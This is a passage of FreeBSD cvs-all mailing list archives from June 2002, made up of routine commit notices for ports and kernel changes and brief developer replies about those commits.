(8.11.6/8.11.6) id g5KG03i09404; Thu, 20 Jun 2002 09:00:03 -0700 (PDT) (envelope-from des) Message-Id: <200206201600.g5KG03i09404@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Thu, 20 Jun 2002 09:00:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news/inn-stable distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/20 09:00:03 PDT Modified files: news/inn-stable distinfo Log: Upgrade to 2.3.20020620. Revision Changes Path 1.43 +1 -1 ports/news/inn-stable/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9: 4: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 322EE37B408; Thu, 20 Jun 2002 09:03:52 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KG3q610336; Thu, 20 Jun 2002 09:03:52 -0700 (PDT) (envelope-from fenner) Message-Id: <200206201603.g5KG3q610336@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 09:03:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/libh Makefile ports/misc/libh/files cvspass X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 09:03:52 PDT Modified files: misc/libh Makefile Added files: misc/libh/files cvspass Log: Use a local cvspass file which is already logged in to the CVS server; this eliminates the interactive step of logging in and possible permission problems with ~/.cvspass . Revision Changes Path 1.16 +1 -15 ports/misc/libh/Makefile 1.1 +1 -0 ports/misc/libh/files/cvspass (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:12:55 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 708FF37B40A; Thu, 20 Jun 2002 09:12:50 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6TFK; Thu, 20 Jun 2002 19:14:56 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5KGCtb39196; Thu, 20 Jun 2002 19:12:55 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D11FF39.A1FF5E74@FreeBSD.org> Date: Thu, 20 Jun 2002 19:13:45 +0300 From: Maxim Sobolev Reply-To: vegacap@i.com.ua Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: Joe Marcus Clarke Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.inports/x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in ports/x11-toolkits/guile-gtk/filespatch-Makefile.in References: <200206192114.g5JLEiH02705@freefall.freebsd.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Joe Marcus Clarke wrote: > > marcus 2002/06/19 14:14:44 PDT > > Added files: > devel/libgtop patch-sysdeps_guile_Makefile.in > patch-sysdeps_guile_names_Makefile.in > x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in > x11-toolkits/guile-gtk/files patch-Makefile.in > Log: > It seems the guile-snarf syntax has changed in 1.4.1. Update ports which > use the old syntax. > > Prompted by: Mike Harding Pointy hat to: ijliao -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:17:52 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 7757C37B407; Thu, 20 Jun 2002 09:17:43 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6TFS; Thu, 20 Jun 2002 19:19:49 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5KGHmb39226; Thu, 20 Jun 2002 19:17:48 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D12005F.3B34137E@FreeBSD.org> Date: Thu, 20 Jun 2002 19:18:39 +0300 From: Maxim Sobolev Reply-To: vegacap@i.com.ua Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: vegacap@i.com.ua Cc: Joe Marcus Clarke , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.inports/x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in ports/x11-toolkits/guile-gtk/filespatch-Makefile.in References: <200206192114.g5JLEiH02705@freefall.freebsd.org> <3D11FF39.A1FF5E74@FreeBSD.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Maxim Sobolev wrote: > > Joe Marcus Clarke wrote: > > > > marcus 2002/06/19 14:14:44 PDT > > > > Added files: > > devel/libgtop patch-sysdeps_guile_Makefile.in > > patch-sysdeps_guile_names_Makefile.in > > x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in > > x11-toolkits/guile-gtk/files patch-Makefile.in > > Log: > > It seems the guile-snarf syntax has changed in 1.4.1. Update ports which > > use the old syntax. > > > > Prompted by: Mike Harding > > Pointy hat to: ijliao OOPS, sorry, I meant to post this note in reply to marcus's shlib version bump. -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:19: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from gyros.marcuscom.com (dhcp-64-102-60-51.cisco.com [64.102.60.51]) by hub.freebsd.org (Postfix) with ESMTP id 8306037B409; Thu, 20 Jun 2002 09:18:51 -0700 (PDT) Received: from gyros.marcuscom.com (localhost [127.0.0.1]) by gyros.marcuscom.com (8.12.3/8.12.3) with ESMTP id g5KGIXoe000447; Thu, 20 Jun 2002 12:18:33 -0400 (EDT) (envelope-from marcus@FreeBSD.org) Received: (from marcus@localhost) by gyros.marcuscom.com (8.12.3/8.12.3/Submit) id g5KGIWlN000446; Thu, 20 Jun 2002 12:18:32 -0400 (EDT) X-Authentication-Warning: gyros.marcuscom.com: marcus set sender to marcus@FreeBSD.org using -f Subject: Re: cvs commit: ports/devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.inports/x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in ports/x11-toolkits/guile-gtk/filespatch-Makefile.in From: Joe Marcus Clarke To: vegacap@i.com.ua Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org In-Reply-To: <3D12005F.3B34137E@FreeBSD.org> References: <200206192114.g5JLEiH02705@freefall.freebsd.org> <3D11FF39.A1FF5E74@FreeBSD.org> <3D12005F.3B34137E@FreeBSD.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 20 Jun 2002 12:18:32 -0400 Message-Id: <1024589912.329.9.camel@gyros.marcuscom.com> Mime-Version: 1.0 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, 2002-06-20 at 12:18, Maxim Sobolev wrote: > Maxim Sobolev wrote: > > > > Joe Marcus Clarke wrote: > > > > > > marcus 2002/06/19 14:14:44 PDT > > > > > > Added files: > > > devel/libgtop patch-sysdeps_guile_Makefile.in > > > patch-sysdeps_guile_names_Makefile.in > > > x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in > > > x11-toolkits/guile-gtk/files patch-Makefile.in > > > Log: > > > It seems the guile-snarf syntax has changed in 1.4.1. Update ports which > > > use the old syntax. > > > > > > Prompted by: Mike Harding > > > > Pointy hat to: ijliao > > OOPS, sorry, I meant to post this note in reply to marcus's shlib > version bump. Pointy hat to me on this particular commit. I accidentally committed the libgtop patches to the root libgtop directory :-/. Joe > > -Maxim > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:24:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 951C237B408; Thu, 20 Jun 2002 09:24:12 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KGOCI17517; Thu, 20 Jun 2002 09:24:12 -0700 (PDT) (envelope-from marcus) Message-Id: <200206201624.g5KGOCI17517@freefall.freebsd.org> From: Joe Marcus Clarke Date: Thu, 20 Jun 2002 09:24:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/balsa2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/20 09:24:12 PDT Modified files: mail/balsa2 Makefile Log: This port should be named balsa2. Revision Changes Path 1.59 +1 -1 ports/mail/balsa2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:27:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3B0B37B484; Thu, 20 Jun 2002 09:26:36 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KGQa318634; Thu, 20 Jun 2002 09:26:36 -0700 (PDT) (envelope-from marcus) Message-Id: <200206201626.g5KGQa318634@freefall.freebsd.org> From: Joe Marcus Clarke Date: Thu, 20 Jun 2002 09:26:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/balsa2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/20 09:26:36 PDT Modified files: mail/balsa2 Makefile Log: Correct DISTNAME. Revision Changes Path 1.60 +1 -0 ports/mail/balsa2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:39:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8260537B406; Thu, 20 Jun 2002 09:39:48 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KGdms22891; Thu, 20 Jun 2002 09:39:48 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206201639.g5KGdms22891@freefall.freebsd.org> From: Maxim Sobolev Date: Thu, 20 Jun 2002 09:39:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/gdk-pixbuf/files patch-ac X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/20 09:39:48 PDT Modified files: graphics/gdk-pixbuf/files patch-ac Log: Don't bother to build tests which aren't installed anyway. Revision Changes Path 1.11 +11 -2 ports/graphics/gdk-pixbuf/files/patch-ac To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:40:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F071337B40C; Thu, 20 Jun 2002 09:40:43 -0700 (PDT) Received: (from ceri@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KGeha23063; Thu, 20 Jun 2002 09:40:43 -0700 (PDT) (envelope-from ceri) Message-Id: <200206201640.g5KGeha23063@freefall.freebsd.org> From: Ceri Davies Date: Thu, 20 Jun 2002 09:40:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/pgpkeys ceri.key chapter.sgml pgpkeys.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ceri 2002/06/20 09:40:43 PDT Modified files: en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent Added files: en_US.ISO8859-1/books/handbook/pgpkeys ceri.key Log: Add my key to the handbook. Revision Changes Path 1.1 +42 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/ceri.key (new) 1.161 +5 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/chapter.sgml 1.36 +1 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/pgpkeys.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9:44:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E96AA37B40C; Thu, 20 Jun 2002 09:44:19 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KGiJj23799; Thu, 20 Jun 2002 09:44:19 -0700 (PDT) (envelope-from glewis) Message-Id: <200206201644.g5KGiJj23799@freefall.freebsd.org> From: Greg Lewis Date: Thu, 20 Jun 2002 09:44:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/rascal Makefile distinfo ports/math/rascal/files patch-hoc.y X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/20 09:44:19 PDT Modified files: math/rascal Makefile distinfo Added files: math/rascal/files patch-hoc.y Log: . Update to 0.3.1. . Unbreak by adding a patch for hoc.y. Note: Cannot update to 0.3.2 due to 4.x having an older readline library. Revision Changes Path 1.14 +2 -2 ports/math/rascal/Makefile 1.14 +1 -1 ports/math/rascal/distinfo 1.1 +38 -0 ports/math/rascal/files/patch-hoc.y (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 10:11: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6690B37B405; Thu, 20 Jun 2002 10:11:00 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KHB0530872; Thu, 20 Jun 2002 10:11:00 -0700 (PDT) (envelope-from lioux) Message-Id: <200206201711.g5KHB0530872@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Thu, 20 Jun 2002 10:11:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/kwebwatch Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/20 10:11:00 PDT Modified files: www/kwebwatch Makefile Log: Unmark BROKEN. bento is incorrectly flagging this as BROKEN Reviewed by: kris Revision Changes Path 1.8 +0 -2 ports/www/kwebwatch/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 10:25:39 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id 97A9437B40B; Thu, 20 Jun 2002 10:25:31 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 133C466D51; Thu, 20 Jun 2002 10:25:30 -0700 (PDT) Date: Thu, 20 Jun 2002 10:25:30 -0700 From: Kris Kennaway To: Greg Lewis Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/math/rascal Makefile distinfo ports/math/rascal/files patch-hoc.y Message-ID: <20020620102530.C55383@xor.obsecurity.org> References: <200206201644.g5KGiJj23799@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TYecfFk8j8mZq+dy" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206201644.g5KGiJj23799@freefall.freebsd.org>; from glewis@FreeBSD.org on Thu, Jun 20, 2002 at 09:44:19AM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --TYecfFk8j8mZq+dy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jun 20, 2002 at 09:44:19AM -0700, Greg Lewis wrote: > glewis 2002/06/20 09:44:19 PDT >=20 > Modified files: > math/rascal Makefile distinfo=20 > Added files: > math/rascal/files patch-hoc.y=20 > Log: > . Update to 0.3.1. > . Unbreak by adding a patch for hoc.y. > =20 > Note: Cannot update to 0.3.2 due to 4.x having an older readline librar= y. You probably could if you add a dependency on the readline port for appropriate 4.x systems. Kris --TYecfFk8j8mZq+dy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9EhAKWry0BWjoQKURAusnAJ9+vOvq3mIN1m1+2tcvRLrhgfXVNQCaAqN8 5SNvqL/GABewAezs/UNiwlo= =mmRO -----END PGP SIGNATURE----- --TYecfFk8j8mZq+dy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 10:27:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2CF9037B407; Thu, 20 Jun 2002 10:27:29 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KHRTp32255; Thu, 20 Jun 2002 10:27:29 -0700 (PDT) (envelope-from alfred) Message-Id: <200206201727.g5KHRTp32255@freefall.freebsd.org> From: Alfred Perlstein Date: Thu, 20 Jun 2002 10:27:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern kern_exec.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/20 10:27:29 PDT Modified files: sys/kern kern_exec.c Log: Don't leak resources if fdcheckstd() fails during exec. Submitted by: Mike Makonnen Revision Changes Path 1.166 +10 -5 src/sys/kern/kern_exec.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 10:33: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 521AD37B409; Thu, 20 Jun 2002 10:32:40 -0700 (PDT) Received: (from mike@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KHWes33023; Thu, 20 Jun 2002 10:32:40 -0700 (PDT) (envelope-from mike) Message-Id: <200206201732.g5KHWes33023@freefall.freebsd.org> From: Mike Barcroft Date: Thu, 20 Jun 2002 10:32:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/projects/c99 index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mike 2002/06/20 10:32:40 PDT Modified files: en/projects/c99 index.sgml Log: Catch up with some MFCs. Revision Changes Path 1.38 +32 -32 www/en/projects/c99/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 10:46:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9351137B410; Thu, 20 Jun 2002 10:46:15 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KHkFM34079; Thu, 20 Jun 2002 10:46:15 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206201746.g5KHkFM34079@freefall.freebsd.org> From: Maxim Sobolev Date: Thu, 20 Jun 2002 10:46:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/gal Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/20 10:46:15 PDT Modified files: x11-toolkits/gal Makefile distinfo Log: Update to 0.19.3. Revision Changes Path 1.34 +6 -6 ports/x11-toolkits/gal/Makefile 1.24 +1 -1 ports/x11-toolkits/gal/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:38:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7076837B409; Thu, 20 Jun 2002 11:38:28 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KIcSr43372; Thu, 20 Jun 2002 11:38:28 -0700 (PDT) (envelope-from alc) Message-Id: <200206201838.g5KIcSr43372@freefall.freebsd.org> From: Alan Cox Date: Thu, 20 Jun 2002 11:38:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_unix.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/20 11:38:28 PDT Modified files: sys/vm vm_unix.c Log: o Remove an incorrect cast from obreak(). This cast would, for example, break an sbrk(>=4GB) on 64-bit architectures even if the resource limit allowed it. o Correct an off-by-one error. o Correct a spelling error in a comment. o Reorder an && expression so that the commonly FALSE expression comes first. Submitted by: bde (bullets 1 and 2) Revision Changes Path 1.39 +5 -5 src/sys/vm/vm_unix.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:44:59 2002 Delivered-To: cvs-all@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B096537B401; Thu, 20 Jun 2002 11:44:55 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5KIisDK071822; Thu, 20 Jun 2002 14:44:54 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5KIislg071819; Thu, 20 Jun 2002 14:44:54 -0400 (EDT) (envelope-from wollman) Date: Thu, 20 Jun 2002 14:44:54 -0400 (EDT) From: Garrett Wollman Message-Id: <200206201844.g5KIislg071819@khavrinen.lcs.mit.edu> To: Gregory Neil Shapiro Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/share/examples/etc make.conf src/share/man/man5make.conf.5 In-Reply-To: <15633.63025.19329.57495@horsey.gshapiro.net> References: <200206200433.g5K4X6N80308@freefall.freebsd.org> <3D1194D6.993AB531@FreeBSD.org> <15633.63025.19329.57495@horsey.gshapiro.net> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG < said: > That is exactly why I added the warning. I could also have the Makefile > give an error and abort the buildworld. Rather than adding a warning, how about fixing the bug? No files outside of the object tree may ever be modified during a build. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:52:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 098DD37B401; Thu, 20 Jun 2002 11:52:55 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KIqtR45478; Thu, 20 Jun 2002 11:52:55 -0700 (PDT) (envelope-from alfred) Message-Id: <200206201852.g5KIqtR45478@freefall.freebsd.org> From: Alfred Perlstein Date: Thu, 20 Jun 2002 11:52:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys socket.h src/sys/kern sys_generic.c uipc_socket.c uipc_syscalls.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/20 11:52:54 PDT Modified files: sys/sys socket.h sys/kern sys_generic.c uipc_socket.c uipc_syscalls.c Log: Implement SO_NOSIGPIPE option for sockets. This allows one to request that an EPIPE error return not generate SIGPIPE on sockets. Submitted by: lioux Inspired by: Darwin Revision Changes Path 1.103 +2 -1 src/sys/kern/sys_generic.c 1.123 +2 -0 src/sys/kern/uipc_socket.c 1.113 +2 -1 src/sys/kern/uipc_syscalls.c 1.65 +1 -0 src/sys/sys/socket.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:55:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BCC2537B40C; Thu, 20 Jun 2002 11:55:28 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KItSR45860; Thu, 20 Jun 2002 11:55:28 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206201855.g5KItSR45860@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 11:55:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/cad/vipec Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 11:55:28 PDT Modified files: cad/vipec Makefile distinfo pkg-plist Log: upgrade to 3.1.2b3 PR: 39169 Submitted by: Oliver 